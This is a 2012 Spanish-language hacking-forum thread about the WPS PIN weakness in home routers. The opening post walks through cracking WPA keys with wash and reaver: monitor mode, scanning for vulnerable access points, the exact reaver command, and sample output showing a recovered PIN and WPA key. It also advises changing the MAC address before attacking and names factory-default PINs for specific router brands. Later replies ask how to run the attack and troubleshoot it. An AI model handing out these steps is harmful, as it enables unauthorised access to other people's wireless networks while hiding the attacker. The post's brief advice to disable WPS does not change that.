Enero 20, 2018, 09:28:07 pm

Autor Tema: WPA,gracias a WPS casi al descubierto sin diccionario.  (Leído 55928 veces)

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado ps3ps3ps3

  • Me das tu IP?
  • *
  • Mensajes: 63
  • Yo AMO a pOrtal HAcker!
    • Ver Perfil
WPA,gracias a WPS casi al descubierto sin diccionario.
« en: Enero 19, 2012, 05:24:27 am »
Muy Buenas a tod@s:

Se ha descubierto una vulnerabilidad en el estándar WPS (Wi-Fi Protected
Setup) que podría comprometer la robustez del PIN.

Wi-Fi Protected Setup, o WPS por sus siglas, es un estándar incluido
en muchos routers y dispositivos wifi que facilita a los usuarios la
creación de redes inalámbricas seguras. Dicho estándar dispone de
varios métodos para agregar dispositivos a una red:
* a través de un número PIN de 8 dígitos
* pulsando un botón de configuración (PBC o Push Button Configuration)
* mediante NFC (Near-Field Communication) acercando los dispositivos al
punto de acceso o router
* utilizando una llave USB que almacena los datos de la configuración

El estándar WPS lo implementan productos de fabricantes como Cisco,
Technicolor, TP-Link, ZyXEL, D-Link, Netgear, Linksys, y Buffalo, entre
otros muchos.

Vamos a ver un ejemplo practico:Reaver lo podeis descargar aqui You are not allowed to view links. Register or Login o bien usarlo con wifiway (que ya lo lleva incorporado)


1.- Walsh --> Lo que hará es detectar qué APs pudiesen ser vulnerables

Walsh v1.3

Required Arguments:
   -i, --interface=<iface>              Interface to capture packets on
   -f, --file [FILE1 FILE2 FILE3 ...]   Read packets from capture files

Optional Arguments:
   -c, --channel=<num>                  Channel to listen on [auto]
   -o, --out-file=<file>                Write data to file
   -n, --probes=<num>                   Maximum number of probes to send to each AP in scan mode [15]
   -C, --ignore-fcs                     Ignore frame checksum errors
   -5, --5ghz                           Use 5GHz 802.11 channels
   -s, --scan                           Use scan mode
   -u, --survey                         Use survey mode [default]
   -h, --help                           Show help

Ejemplo de uso:   walsh -i mon0

Scanning for supported APs...

00:19:15:XXXXXXXX WLAN_5XXX
00:19:15:XXXXXXXX WLAN_3XXX
X0:21:B7:XXXXXXXX XXXXXXXXX
64:68:0C:XXXXXXXX WLAN_XXXX
C4:3D:C7:XXXXXXXX ONOXXX

Lo debeis parar con control+c

2.- reaver: Sirve para lanzar los PINS e ir probando. Puede llegar a tardar muchas horas

Uso: reaver -i mon0 -b C4:3D:C7:XXXXXXXX -vv

Resultado

    94.67% complete @ 2012-01-08 08:34:36 (4 seconds/attempt)
    WPS PIN: '5XXXXXXX'
    WPA PSK: '1XXXXXXXXX'
    AP SSID: 'ONOXXXX'


Así que ya sabeis que debeis deshabilitar el WPS de vuestro router chavales.

P.D: La herramienta Walsh para detectar AP´s vulnerables al ataque no funciona en Wifiway,no se el por que,quiza sea beta o quiza este mal programada la utilidad,cuando lo sepa os lo pongo en este mismo post.

P.D: Tengo una manera de saber AP´s vulnerables con una utilidad de mi rt3070,la cual me permite conectarme a cualquier red,teniendo la clave claro xD,lo mejor es eso,que me dice los AP,s que tienen WPS activado,mirad la foto:

You are not allowed to view links. Register or Login REAVER SOLO FUNCIONA CON ROUTERS CON WPS ACTIVADO.

Pero tambien se puede averiguar con Wireshark por si no teneis esa antena ni ese programa:

Ponemos la tarjeta en modo monitor:

airmon-ng start wlan0 (suponiendo que sea wlan0 y no wlan1...etc)

Abrimos el wireshark y en las opciones de captura elegimos interfaz mon0, o la que nos haya dado el airmon. Nos aseguramos que no esté seleccionada ninguna opción tal que así:

You are not allowed to view links. Register or Login

Le damos a Start

Empezará a capturar paquetes. Para ver si tiene el WPS activado miramos en los paquetes broadcast la información que se encuentra en:

----->IEEE 802.11 wireless LAN management frame
----------->Tagged parameters:
--------------> Tag: Vendor Specific: Microsoft WPS

Aqui esta el ejemplo:

You are not allowed to view links. Register or Login

Añado una cosa mas que se olvidaba:

Según indican en la página del proyecto la versión svn de kismet detecta los ataques "WPS BruteForce"

You are not allowed to view links. Register or Login

Os dejo una imagen para que veais mejor: You are not allowed to view links. Register or Login

Asi que antes de usar reaver no esta nada mal cambiar la mac a una aleatoria que se os ocurra

P.D: Pongo algo nuevo por que es importante,las redes WLAN_XXXX routers Observa Telecom 00:19:15:XX:XX:XX,el PIN que traen por defecto es 12345670,como podeis ver la clave salta en 10 segundos por que la version de reaver 1.4 prueba ese pin en el primer intento,en esta imagen se comprueba: You are not allowed to view links. Register or Login

Saludos peña ;)
« Última modificación: Enero 23, 2012, 04:28:19 pm por ps3ps3ps3 »

Desconectado soez

  • Yo vivo en CPH
  • ***
  • Mensajes: 1283
  • Sexo: Masculino
    • Ver Perfil
Re:WPA,gracias a WPS casi al descubierto.
« Respuesta #1 en: Enero 19, 2012, 06:46:59 am »
Muy buena  ;D

PD. Habrá que probarlo :)
« Última modificación: Enero 19, 2012, 06:51:18 am por soez »
You are not allowed to view links. Register or Login
01001010 01100001 01110110 01101001 01100101 01110010

Desconectado ps3ps3ps3

  • Me das tu IP?
  • *
  • Mensajes: 63
  • Yo AMO a pOrtal HAcker!
    • Ver Perfil
Re:WPA,gracias a WPS casi al descubierto.
« Respuesta #2 en: Enero 19, 2012, 06:50:56 am »
Gracias  ;)

Desconectado ps3ps3ps3

  • Me das tu IP?
  • *
  • Mensajes: 63
  • Yo AMO a pOrtal HAcker!
    • Ver Perfil
Re:WPA,gracias a WPS casi al descubierto.
« Respuesta #3 en: Enero 19, 2012, 07:02:37 am »
Yo ya probe un poco jeje  :),solo probe con 2 routers,uno de ellos parece que no asociaba,pero con el otro empezo a probar pins,pero lo quite por que la verdad no me interesa quitar ninguna WPA pero funcionar,funciona.

Creo que los routers Livebox tienen un sistema que elude el mecanismo de accion de reaver,lo voy a poner ahora en el post que se me olvido.

P.D: Añadido lo que faltaba,Saludos.
« Última modificación: Enero 19, 2012, 07:11:29 am por ps3ps3ps3 »

Desconectado maik_90

  • Me das tu IP?
  • *
  • Mensajes: 121
  • Yo AMO a pOrtal HAcker!
    • Ver Perfil
Re:WPA,gracias a WPS casi al descubierto sin diccionario.
« Respuesta #4 en: Enero 19, 2012, 04:01:21 pm »
Ola. No soy un experto en la materia pero por lo que he leido es posible que esta aplicacion de caza a las pass wpa?
Si es asi, me podriais decir como probarlo yo en mi pc.
gracias

Desconectado Aetsu

  • Si te metes con CPH
    te metes conmigo
  • ****
  • Mensajes: 1707
  • Sexo: Femenino
    • Ver Perfil
Re:WPA,gracias a WPS casi al descubierto sin diccionario.
« Respuesta #5 en: Enero 19, 2012, 04:19:13 pm »
Buen post, llevo unos dias intentando hacer cositas con esto, pero entre examenes y la falta de hardware no he podido.

Lo dicho, buen trabajo ;)
You are not allowed to view links. Register or Login


Desconectado ps3ps3ps3

  • Me das tu IP?
  • *
  • Mensajes: 63
  • Yo AMO a pOrtal HAcker!
    • Ver Perfil
Re:WPA,gracias a WPS casi al descubierto sin diccionario.
« Respuesta #6 en: Enero 19, 2012, 04:36:18 pm »
Gracias  :D aportando todo lo que se pueda,espero que guste a mas gente.

Saludos.

Desconectado ps3ps3ps3

  • Me das tu IP?
  • *
  • Mensajes: 63
  • Yo AMO a pOrtal HAcker!
    • Ver Perfil
Re:WPA,gracias a WPS casi al descubierto sin diccionario.
« Respuesta #7 en: Enero 19, 2012, 04:47:19 pm »
Pues mira,aun no he sacado ninguna clave por que tarda "bastante",de 4 a 10 horas,pero si he probado reaver en Ubuntu 11.10 y va bien,sigue los pasos y va perfecto,si,cuando saca el pass WPS automaticamente genera tambien la clave WPA,eso es lo bueno,la clave WPS es como un puente rapido digamos para llegar a la clave WPA,todo automatico claro.

Leelo bien,empieza a probar y si te atascas en algo me dices,te aconsejo que utilizes Wifiway 3.4 que trae ya instalado Reaver asi no tienes que instalarlo en Ubuntu y tal... y te recuerdo por si no lo sabes que no va en Windows solo en Linux  ;).

P.D: Pongo algo nuevo por que es importante,las redes WLAN_XXXX routers Observa Telecom 00:19:15:XX:XX:XX,el PIN que traen por defecto es 12345670,como podeis ver la clave salta en 10 segundos por que la version de reaver 1.4 prueba ese pin en el primer intento,en esta imagen se comprueba: You are not allowed to view links. Register or Login
(Lo añado al post)

Saludos.
« Última modificación: Enero 19, 2012, 04:56:23 pm por ps3ps3ps3 »

Desconectado Khan-BG

  • Yo vivo en CPH
  • ***
  • Mensajes: 660
    • Ver Perfil
Re:WPA,gracias a WPS casi al descubierto sin diccionario.
« Respuesta #8 en: Enero 19, 2012, 11:07:40 pm »

Yo se porque no funciona, no es que no funcione en wifiway, lo hace, lo que pasa es que RT3070 no esta soportada, es cuestión de mirarse la documentación You are not allowed to view links. Register or Login yo cuando probé con mi RT3070 no paraba de salirme

[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...

Incluso usé el modo -C aunque sabiendo que no influiría en nada puesto que solo lo que haria es ocultarlos.

Entonces busque la documentacion y casi al mismo tiempo de que cogia mi querida Realtek 8187L enconté lo que buscaba, y la 8187L esta full soportada ^-^ Como de costumbre, vamos.

Y si, con la 8187L si que anduvo el walsh

(Probado en Sabayon Linux)
Mi Blog
You are not allowed to view links. Register or Login

Desconectado soez

  • Yo vivo en CPH
  • ***
  • Mensajes: 1283
  • Sexo: Masculino
    • Ver Perfil
Re:WPA,gracias a WPS casi al descubierto sin diccionario.
« Respuesta #9 en: Enero 20, 2012, 06:23:46 am »

Livebox de orange también trae 12345670 por defecto, lo tengo yo.

Desconectado ps3ps3ps3

  • Me das tu IP?
  • *
  • Mensajes: 63
  • Yo AMO a pOrtal HAcker!
    • Ver Perfil
Re:WPA,gracias a WPS casi al descubierto sin diccionario.
« Respuesta #10 en: Enero 20, 2012, 06:56:14 am »
P.D: La herramienta Walsh para detectar AP´s vulnerables al ataque no funciona en Wifiway,no se el por que,quiza sea beta o quiza este mal programada la utilidad,cuando lo sepa os lo pongo en este mismo post.

P.D: Tengo una manera de saber AP´s vulnerables con una utilidad de mi rt3070,la cual me permite conectarme a cualquier red,teniendo la clave claro xD,lo mejor es eso,que me dice los AP,s que tienen WPS activado,mirad la foto:

Yo se porque no funciona, no es que no funcione en wifiway, lo hace, lo que pasa es que RT3070 no esta soportada, es cuestión de mirarse la documentación You are not allowed to view links. Register or Login yo cuando probé con mi RT3070 no paraba de salirme

[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...

Incluso usé el modo -C aunque sabiendo que no influiría en nada puesto que solo lo que haria es ocultarlos.

Entonces busque la documentacion y casi al mismo tiempo de que cogia mi querida Realtek 8187L enconté lo que buscaba, y la 8187L esta full soportada ^-^ Como de costumbre, vamos.

Y si, con la 8187L si que anduvo el walsh

(Probado en Sabayon Linux)
[/quote]

Ok gracias,yo tengo las 2 antenas asi que probare luego,encontraste algo para poner compatible la rt3070? Saludos.

Desconectado maik_90

  • Me das tu IP?
  • *
  • Mensajes: 121
  • Yo AMO a pOrtal HAcker!
    • Ver Perfil
Re:WPA,gracias a WPS casi al descubierto sin diccionario.
« Respuesta #11 en: Enero 20, 2012, 09:32:00 am »
ola xavales!!!
ya me descargue wifiway3.4 y lo inicie desde cd. Sigo todos los pasos pero cuando ejecuto reaver me da un error con la ap dice algo de 60segundos, asi sucesivamente. alguna sugerencia????

Desconectado b4dm4st3r

  • Me das tu password?
  • **
  • Mensajes: 262
  • Sexo: Masculino
  • NoVaTo PeRo CoN GaNaS De ApRenDer!!
    • Ver Perfil
    • ¡TODO PELICULAS!
Re:WPA,gracias a WPS casi al descubierto sin diccionario.
« Respuesta #12 en: Enero 20, 2012, 10:00:53 am »
:D se ve interesante!! por fin a deshasernos un poco de los diccionarios!!!  :cool: jaja

You are not allowed to view links. Register or Login
El inteligente no es aquel que lo sabe todo sino aquel que sabe utilizar lo poco que sabe.

Desconectado Khan-BG

  • Yo vivo en CPH
  • ***
  • Mensajes: 660
    • Ver Perfil
Re:WPA,gracias a WPS casi al descubierto sin diccionario.
« Respuesta #13 en: Enero 20, 2012, 11:21:06 am »

No proporcionas suficiente info sobre lo que te está saliendo, pero me imagino que el error es que no puedes conectar con la AP porque tenga filtrado de MAC

Desconectado WaesWaes

  • Actualmente es
  • Colaborador
  • ****
  • Mensajes: 4402
  • You are not prepared!
    • Ver Perfil
Re:WPA,gracias a WPS casi al descubierto sin diccionario.
« Respuesta #14 en: Enero 20, 2012, 11:31:14 am »
Te falto la fuente. Agregala o el post no sirve

Saludos


question
ver web cam sin ser descubierto

Iniciado por zeus013

4 Respuestas
1857 Vistas
Último mensaje Julio 29, 2012, 03:14:21 pm
por OnTheCore
xx
HTTP al descubierto

Iniciado por seth

15 Respuestas
17307 Vistas
Último mensaje Diciembre 14, 2016, 06:04:20 am
por .xAk.
xx
Cookies al descubierto

Iniciado por The X-C3LL

15 Respuestas
6688 Vistas
Último mensaje Junio 10, 2013, 05:32:02 pm
por seth
xx
Falsificadores al Descubierto.

Iniciado por JaAViEr

0 Respuestas
982 Vistas
Último mensaje Marzo 07, 2009, 08:37:13 pm
por JaAViEr
xx
carpeta wp-admin al descubierto.

Iniciado por ruben_linux

4 Respuestas
1184 Vistas
Último mensaje Noviembre 21, 2011, 08:17:38 pm
por seth
xx
Speed Touch 585 v6 al descubierto.

Iniciado por lampi

0 Respuestas
4866 Vistas
Último mensaje Febrero 14, 2007, 08:56:26 am
por lampi
exclamation
HTTP al descubierto by LIx & The X-C3LL

Iniciado por Sknight

5 Respuestas
1800 Vistas
Último mensaje Marzo 18, 2009, 03:29:25 pm
por c4x30x
exclamation
Los códigos secretos de Android al descubierto

Iniciado por Stuxnet

0 Respuestas
1061 Vistas
Último mensaje Agosto 05, 2012, 06:34:28 pm
por Stuxnet
exclamation
Wifi-Link 1 Watt USB al descubierto!

Iniciado por SEKTOR

2 Respuestas
1666 Vistas
Último mensaje Agosto 22, 2010, 12:45:49 pm
por 5475UK1
question
Entrar en otro equipo de mi lan sin ser descubierto

Iniciado por shurfin

3 Respuestas
3073 Vistas
Último mensaje Octubre 31, 2009, 04:40:34 am
por shurfin